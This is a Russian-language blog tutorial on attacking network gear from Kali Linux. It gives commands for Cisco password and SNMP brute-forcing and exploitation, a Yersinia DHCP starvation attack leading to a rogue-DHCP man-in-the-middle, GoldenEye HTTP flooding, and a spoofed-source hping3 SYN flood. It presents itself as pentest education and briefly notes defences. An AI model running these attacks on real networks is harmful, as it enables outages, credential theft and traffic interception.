В этой статье мы рассмотрим текущие атаки на сетевое оборудование и инструменты, доступные в популярном дистрибутиве Kali Linux для их запуска.
Kali Linux включает несколько инструментов, которые вы можете использовать для тестирования оборудования CISCO. Список можно найти в разделе Vulnerability Analysis — Cisco Tools:
Используется для брутфорса пароля при выключенном режиме aaa-mode, брутфорса SNMP community-строк и проверки на уязвимость IOS History bug (https://tools.cisco.com/security/center/content/CiscoSecurit…)
Пример использования:
CAT -h 192.168.1.209 -w /root/cisco/wordlist/snmpcommunities -a /root/cisco/wordlist/password_list -i
2. Крутой экспоутер Cisco Global Exploiter или CGE
Используется для экслпутации известных уязвимостей. Нам доступно 14 атак:
Пример использования:
cge.pl 192.168.1.201 3
3. Еще одна тулза для автоматического поиска cisco-ocs
Инструмент для автоматизации поиска устройств со стандартными значениями пароля для telnet и активации режима, который может искать устройства в диапазоне адресов. Может использоваться при сканировании больших сетей.
Пример использования:
cisco-ocs 192.168.1.207 192.168.1.209
4. Торч cisco-torch
Многофункциональный сканер уязвимостей оборудования Cisco. Он может сканировать сразу несколько IP-адресов, загружая их из текстового файла. Вы должны запустить cisco-torch в Kali Linux из рабочего каталога / usr / share / cisco-torch.
Пример использования:
Поиск доступных интерфейсов и протоколов и определение типа оборудования.
cisco-torch -A 192.168.1.201
Может использоваться для брутфорса паролей и SNMP community-строк.cisco-torch -s -b 192.168.1.209
Для использования своего словаря, его нужно поместить в /usr/share/cisco-torch вместо файла password.txt
Yersinia — многофункциональный инструмент для атак на протоколы L2 (Data Link) уровня OSI.
Умеет проводить атаки на DHCP, STP, CDP, DTP, HSRP и другие.
Работать с Yersinia можно в нескольких режимах:
Запуск в режиме сервера и управление при помощи команд, похожих на cisco cli.
yersinia -D
telnet 127.0.0.1 12000
Логин и пароль root/root
Пароль для перехода в режим enable – tomac
1. Запуск в интерактивном режиме
yersinia -I
Опции управления доступны по нажатии на клавишу h:
Графический интерфейс может работать нестабильно. В серверном режиме он не поддерживает некоторые типы атак, такие как Rogue DHCP server. Следовательно, интерактивный режим можно считать основным режимом загрузки.
В качестве примера мы показываем атаку переполнения пула IP-адресов DHCP-сервера. Эту атаку можно использовать для отключения корпоративного DHCP-сервера и последующей его замены поддельным, настроенным для маршрутизации всего трафика от новых клиентов через хост злоумышленника. Таким образом осуществляется одна из атак MitM.
На стороне атакующего можно выполнить скрипт nmap для обнаружения DHCP сервера в локальной сети.
nmap -n --script=broadcast-dhcp-discover
Теперь запускаем Yersinia в интерактивном режиме и переходим в режим DHCP выбрав его нажатием клавиши g.
Теперь в этом режиме будут видны все DHCP пакеты, полученные Yersinia.
Проверим список выданных адресов DHCP сервера до атаки:
Yersinia показывает DHCP пакеты, выловленные из сети:
Если вы выберете пакет и нажмете комбинацию клавиш Shift + L, вы можете использовать RAW-атаку для пересылки этого пакета в сеть или изменить его, нажав клавишу e — перейдите в режим редактирования пакета.
При нажатии на клавишу x получаем список доступных атак:
Выбираем 1
Видим, что начинает отправлять огромное количество DHCP Discover запросов:
Через некоторое время можно остановить атаку нажатием на клавиши L и затем Enter:
Nmap больше не показывает доступных DHCP серверов в сети. Коропоративный DHCP сервер выведен из строя.
Проверим таблицу выданных IP-адресов на роутере:
Далее вы можете запустить атаку Rogue DHCP в Yersinia, либо при помощи модуля Metasploit или любым другим способом, чтобы провести MitM атаку.
Атака на истощение пула IP-адресов на DHCP-сервере также может быть проведена с помощью инструмента DHCPig. Yersinia также может атаковать другие популярные протоколы, такие как STP (Spanning Tree Protocol) и HSRP (Hot Standby Router Protocol), которые вы также можете использовать для прослушивания сетевого трафика.
Производители используют различные технологии, обычно проприетарные, для защиты от этого типа атак. На коммутаторах Cisco должны быть включены DHCP Snooping и PortSecutiy, чтобы избежать атак переполнения DHCP и CAM.
Другие технологии используются для защиты от атак на HSRP и другие протоколы. Всегда следует помнить, что дорогое сетевое оборудование после правильной настройки может значительно повысить безопасность сетевой инфраструктуры, в то время как недостаточно настроенное или неправильно настроенное может само по себе стать инструментом в руках злоумышленника и угрозой безопасности.
Выявление уязвимостей в сетевых устройствах во время тестирования на проникновение и применение рекомендаций по тестированию поможет снизить риск взлома информационной системы злоумышленниками.
DoS и DDoS атаки уровня приложений — это атаки, которые нацелены на Windows, Apache, OpenBSD или другое программное обеспечение для выполнения атаки и краха сервера.
DoS и DDoS атаки уровня протокола — это атаки на уровне протокола. Эта категория включает Synflood, Ping of Death и другие.
Этот тип атак включает ICMP-флуд, UDP-флуд и другие типы флуда, осуществляемые через поддельные пакеты.
DoS и DDoS похожи по смыслу. Когда атака проводится с одной машины, обычно говорят о DoS-атаке. При большом количестве злоумышленников из ботнета (или группы) говорят о DDoS-атаке. Об этих атаках доступно много информации, но не имеет значения, какой это тип атаки, поскольку все они одинаково опасны для сервера / сети.
Сторонние программы, установленные не из репозитория, я собираю в каталоге ~/opt. Если у вас нет каталога для сторонних программ, то создайте его и перейдите туда:
mkdir opt
cd opt
Следующая большая команда создаст каталог, загрузит туда последнюю версию GoldenEye, распакует архив и сразу запустит GoldenEye (покажет справку по программе):
mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master.zip && unzip master.zip && cd GoldenEye-master/ && ./goldeneye.py
Если вам хочется всё сделать самому — постепенно, то продолжаем. Для начала создаём каталог GoldenEye, переходим туда и скачиваем архив с программой:
root@WebWare-Kali:~/opt# mkdir GoldenEye
root@WebWare-Kali:~/opt# cd GoldenEye
root@WebWare-Kali:~/opt/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
После скачивания распаковываем файл архива master.zip.
unzip master.zip
Теперь у нас появился каталог GoldenEye-master, переходим туда и проверяем его содержимое:
ls
cd GoldenEye-master/
ls
Запуск очень прост, делается это так:
./goldeneye.py
Запуск слегка различается от используемой вами ОС:
root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(или)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(или)
python goldeneye.py http://www.goldeneyetestsite.com/
В зависимости от того, где вы сохранили файлы, подредактируйте ваш путь и команду.
Следующие предложения хорошо сработают, когда вы используете Apache:
hping3 — бесплатный генератор и анализатор пакетов для протокола TCP / IP. Де-факто Hping является одним из незаменимых инструментов для проверки безопасности и тестирования межсетевых экранов и сетей. Он использовался, чтобы воспользоваться технологией сканирования в режиме ожидания, которая теперь реализована в сканере портов Nmap. Новая версия hping — hping3 — написана на скриптах с использованием языка Tcl. Он реализует движок для удобного описания пакетов TCP / IP строками. Таким образом, программист может написать сценарий, связанный с низкоуровневой обработкой пакетов TCP / IP, и проанализировать их за очень короткое время.
Как и большинство инструментов, используемых в компьютерной безопасности, hping3 полезен для экспертов по безопасности, но есть много приложений, связанных с тестированием сети и системным администрированием.
hping3 следует использовать для…
hping3 уже установлен в Kali Linux как и многие другие инструменты. Он крайне полезен и уже скоро я продемонстрирую его работу.
Ну хватит уже ходить вокруг да около, переходим к атаке. Запускается всё одной простой командой:
root@WebWare-Kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.37
HPING 192.168.1.37 (eth0 192.168.1.37): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.1.37 hping statistic ---
3258138 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@WebWare-Kali:~#
Необходимо ознакомить пользователей с графиком тестирования и возможными перерывами. Потому что результатом симуляции атаки часто бывает перерыв в работе.
Ну и все остальные предупреждения: вы не должны тестировать (симулировать атаку) других без их разрешения. Потому что в случае повреждения вы можете понести ответственность по закону.
Данная информация размещена в образовательных целях. Для тестирования своих серверов, для анализа качества их настройки и разработки мер противодействия атакам.
Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…
Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…
Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…
С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…
Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…
Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…